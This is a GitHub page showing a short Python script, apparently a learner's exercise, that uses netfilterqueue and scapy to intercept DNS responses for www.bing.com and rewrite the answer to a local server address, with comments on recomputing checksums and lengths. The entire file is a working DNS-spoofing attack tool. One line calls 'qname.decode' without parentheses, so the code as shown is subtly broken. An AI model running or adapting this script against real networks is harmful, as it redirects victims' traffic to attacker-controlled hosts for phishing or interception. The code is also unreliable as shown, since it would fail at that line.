python-scripts/dns_spoof.py at main · aki-seven/python-scripts · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload()) # WHY CONVERT INTO SCAPY_PACKET?
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if "www.bing.com" in qname.decode:
            print("[+] Spoofing target")
            answer = scapy.DNSRR(rrname = qname, rdata = "192.168.23.129") # apache2 hosted on my local machine
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1

            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].chksum
            del scapy_packet[scapy.UDP].len

            packet.set_payload(bytes(scapy_packet)) # Used bytes instead of str for python3

    packet.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()


#Algorithm
#     Check for DNS response
#     Create spoofed answer
#     modify scapy_packet in DNSRR
#     del chksum, len in IP, UDP. We will regenrated